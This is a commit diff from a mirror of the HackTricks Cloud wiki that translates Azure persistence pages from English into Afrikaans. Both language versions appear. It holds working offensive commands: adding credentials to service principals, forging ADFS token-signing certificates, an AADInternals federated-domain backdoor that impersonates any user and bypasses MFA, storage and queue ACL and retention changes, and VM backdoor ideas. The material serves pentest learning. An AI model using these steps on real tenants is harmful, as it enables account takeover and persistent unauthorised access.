gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-07 19:00:49 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['.github/pull_request_template.md', 'src/pentesting-cloud/az

Browse Source
This commit is contained in:
Translator
2024-12-31 19:02:02 +00:00
parent 7770a50092
commit 2753c75e8b
244 changed files with 8471 additions and 11302 deletions
Download Patch File Download Diff File Expand all files Collapse all files

46
src/pentesting-cloud/azure-security/az-persistence/README.md
View File

@@ -2,54 +2,45 @@
{{#include ../../../banners/hacktricks-training.md}}
### Illicit Consent Grant
### Illegale Toestemmingstoekenning
By default, any user can register an application in Azure AD. So you can register an application (only for the target tenant) that needs high impact permissions with admin consent (an approve it if you are the admin) - like sending mail on a user's behalf, role management etc.T his will allow us to **execute phishing attacks** that would be very **fruitful** in case of success.
Deur die standaard kan enige gebruiker 'n toepassing in Azure AD registreer. So kan jy 'n toepassing registreer (slegs vir die teiken huur) wat hoë impak toestemmings benodig met administratortoestemming (goedkeur dit as jy die admin is) - soos om e-pos namens 'n gebruiker te stuur, rolbestuur, ens. Dit sal ons toelaat om **phishing-aanvalle** uit te voer wat baie **vrugbaar** sal wees in die geval van sukses.
Moreover, you could also accept that application with your user as a way to maintain access over it.
Boonop kan jy ook daardie toepassing met jou gebruiker aanvaar as 'n manier om toegang daaroor te behou.
### Applications and Service Principals
### Toepassings en Diensbeginsels
With privileges of Application Administrator, GA or a custom role with microsoft.directory/applications/credentials/update permissions, we can add credentials (secret or certificate) to an existing application.
Met die voorregte van Toepassing Administrateur, GA of 'n pasgemaakte rol met microsoft.directory/applications/credentials/update toestemmings, kan ons kredensiale (geheime of sertifikaat) aan 'n bestaande toepassing voeg.
It's possible to **target an application with high permissions** or **add a new application** with high permissions.
Dit is moontlik om **'n toepassing met hoë toestemmings te teiken** of **'n nuwe toepassing** met hoë toestemmings toe te voeg.
An interesting role to add to the application would be **Privileged authentication administrator role** as it allows to **reset password** of Global Administrators.
This technique also allows to **bypass MFA**.
'n Interessante rol om by die toepassing te voeg, sou die **Privileged authentication administrator role** wees, aangesien dit toelaat om die **wagwoord te herstel** van Globale Administrators.
Hierdie tegniek laat ook toe om **MFA te omseil**.
```powershell
$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
```
- For certificate based authentication
- Vir sertifikaat-gebaseerde outentisering
```powershell
Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>
```
### Federasie - Token Ondertekening Sertifikaat
### Federation - Token Signing Certificate
With **DA privileges** on on-prem AD, it is possible to create and import **new Token signing** and **Token Decrypt certificates** that have a very long validity. This will allow us to **log-in as any user** whose ImuutableID we know.
**Run** the below command as **DA on the ADFS server(s)** to create new certs (default password 'AADInternals'), add them to ADFS, disable auto rollver and restart the service:
Met **DA bevoegdhede** op on-prem AD, is dit moontlik om **nuwe Token ondertekening** en **Token Deleksie sertifikate** te skep en in te voer wat 'n baie lang geldigheid het. Dit sal ons in staat stel om **in te teken as enige gebruiker** wie se ImuutableID ons ken.
**Voer** die onderstaande opdrag uit as **DA op die ADFS bediener(s)** om nuwe sertifikate te skep (standaard wagwoord 'AADInternals'), voeg dit by ADFS, deaktiveer outomatiese hernuwing en herbegin die diens:
```powershell
New-AADIntADFSSelfSignedCertificates
```
Then, update the certificate information with Azure AD:
Dan, werk die sertifikaatinligting by met Azure AD:
```powershell
Update-AADIntADFSFederationSettings -Domain cyberranges.io
```
### Federasie - Betroubare Domein
### Federation - Trusted Domain
With GA privileges on a tenant, it's possible to **add a new domain** (must be verified), configure its authentication type to Federated and configure the domain to **trust a specific certificate** (any.sts in the below command) and issuer:
Met GA-privileges op 'n huurder, is dit moontlik om 'n **nuwe domein** toe te voeg (moet geverifieer word), sy autentikasietipe na Federated te konfigureer en die domein te **vertrou op 'n spesifieke sertifikaat** (any.sts in die onderstaande opdrag) en uitgever:
```powershell
# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io
@@ -60,13 +51,8 @@ Get-MsolUser | select userPrincipalName,ImmutableID
# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true
```
## References
## Verwysings
- [https://aadinternalsbackdoor.azurewebsites.net/](https://aadinternalsbackdoor.azurewebsites.net/)
{{#include ../../../banners/hacktricks-training.md}}

12
src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md
View File

@@ -4,7 +4,7 @@
## Queue
For more information check:
Vir meer inligting, kyk:
{{#ref}}
../az-services/az-queue-enum.md
@@ -12,8 +12,7 @@ For more information check:
### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks.
Hierdie toestemming laat 'n aanvaller toe om queues en hul eienskappe binne die stoorrekening te skep of te wysig. Dit kan gebruik word om ongeoorloofde queues te skep, metadata te wysig, of toegangbeheerlys (ACLs) te verander om toegang toe te laat of te beperk. Hierdie vermoë kan werksvloei ontwrig, kwaadwillige data insit, sensitiewe inligting eksfiltreer, of queue-instellings manipuleer om verdere aanvalle moontlik te maak.
```bash
az storage queue create --name <new-queue-name> --account-name <storage-account>
@@ -21,15 +20,10 @@ az storage queue metadata update --name <queue-name> --metadata key1=value1 key2
az storage queue policy set --name <queue-name> --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name <storage-account>
```
## References
## Verwysings
- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
{{#include ../../../banners/hacktricks-training.md}}

34
src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md
View File

@@ -4,42 +4,34 @@
## Storage Privesc
For more information about storage check:
Vir meer inligting oor berging, kyk:
{{#ref}}
../az-services/az-storage.md
{{#endref}}
### Common tricks
### Algemene truuks
- Keep the access keys
- Generate SAS
- User delegated are 7 days max
- Hou die toegang sleutels
- Genereer SAS
- Gebruiker gedelegeer is 7 dae maksimum
### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write
These permissions allows the user to modify blob service properties for the container delete retention feature, which enables or configures the retention period for deleted containers. These permissions can be used for maintaining persistence to provide a window of opportunity for the attacker to recover or manipulate deleted containers that should have been permanently removed and accessing sensitive information.
Hierdie toestemmings laat die gebruiker toe om blob diens eienskappe te wysig vir die houer verwydering retensie kenmerk, wat die retensie tydperk vir verwyderde houers aktiveer of konfigureer. Hierdie toestemmings kan gebruik word om volharding te handhaaf om 'n geleentheid te bied vir die aanvaller om verwyderde houers wat permanent verwyder moes gewees het, te herstel of te manipuleer en toegang tot sensitiewe inligting te verkry.
```bash
az storage account blob-service-properties update \
--account-name <STORAGE_ACCOUNT_NAME> \
--enable-container-delete-retention true \
--container-delete-retention-days 100
--account-name <STORAGE_ACCOUNT_NAME> \
--enable-container-delete-retention true \
--container-delete-retention-days 100
```
### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action
These permissions can lead to the attacker to modify the retention policies, restoring deleted data, and accessing sensitive information.
Hierdie toestemmings kan die aanvaller in staat stel om die retensiebeleide te wysig, verwyderde data te herstel, en toegang tot sensitiewe inligting te verkry.
```bash
az storage blob service-properties delete-policy update \
--account-name <STORAGE_ACCOUNT_NAME> \
--enable true \
--days-retained 100
--account-name <STORAGE_ACCOUNT_NAME> \
--enable true \
--days-retained 100
```
{{#include ../../../banners/hacktricks-training.md}}

24
src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md
View File

@@ -1,29 +1,25 @@
# Az - VMs Persistence
# Az - VMs Persistensie
{{#include ../../../banners/hacktricks-training.md}}
## VMs persistence
## VMs persistensie
For more information about VMs check:
Vir meer inligting oor VMs, kyk:
{{#ref}}
../az-services/vms/
{{#endref}}
### Backdoor VM applications, VM Extensions & Images <a href="#backdoor-instances" id="backdoor-instances"></a>
### Backdoor VM toepassings, VM Uitbreidings & Beelde <a href="#backdoor-instances" id="backdoor-instances"></a>
An attacker identifies applications, extensions or images being frequently used in the Azure account, he could insert his code in VM applications and extensions so every time they get installed the backdoor is executed.
'n Aanvaller identifiseer toepassings, uitbreidings of beelde wat gereeld in die Azure-rekening gebruik word, hy kan sy kode in VM-toepassings en uitbreidings invoeg sodat elke keer as hulle geïnstalleer word, die backdoor uitgevoer word.
### Backdoor Instances <a href="#backdoor-instances" id="backdoor-instances"></a>
### Backdoor Instansies <a href="#backdoor-instances" id="backdoor-instances"></a>
An attacker could get access to the instances and backdoor them:
'n Aanvaller kan toegang tot die instansies verkry en hulle backdoor:
- Using a traditional **rootkit** for example
- Adding a new **public SSH key** (check [EC2 privesc options](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc))
- Backdooring the **User Data**
- Deur 'n tradisionele **rootkit** te gebruik
- 'n Nuwe **publieke SSH-sleutel** by te voeg (kyk [EC2 privesc opsies](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc))
- Die **Gebruiker Data** te backdoor
{{#include ../../../banners/hacktricks-training.md}}